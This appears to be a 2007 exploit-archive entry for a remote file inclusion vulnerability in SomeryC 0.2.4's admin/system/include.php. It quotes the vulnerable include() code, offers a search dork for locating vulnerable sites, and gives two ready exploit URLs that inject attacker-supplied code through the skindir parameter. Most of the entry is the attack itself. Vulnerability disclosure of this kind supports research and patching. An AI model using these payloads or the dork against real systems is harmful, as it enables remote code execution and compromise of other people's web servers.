[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SomeryC <= 0.2.4 (include.php skindir) Remote File Inclusion Vulnerability
# Published : 2007-08-27
# Author : Katatafish
# Previous Title : PHPNuke-Clan <= 4.2.0 (mvcw_conver.php) RFI Vulnerability
# Next Title : Arcadem 2.01 Remote SQL Injection / RFI Vulnerabilties
### SomeryC <= v0.2.4 Remote File Include ###
#Vendor: http://someryc.mostpopularcomic.com
#download http://someryc.mostpopularcomic.com/sC024.zip
#found by: Katatafish (karatatata@hush.com)
#d0rk: "powered by someryc"
#vuln-code(/admin/system/include.php):
if ($start) {
....
include("$skindir/header.php");
}
....
include("$skindir/footer.php");
#exploit:
http://www.site.com/admin/system/include.php?skindir=[evilCode]
http://www.site.com/admin/system/include.php?start=1&skindir=[evilCode]
# www.Syue.com [2007-08-27]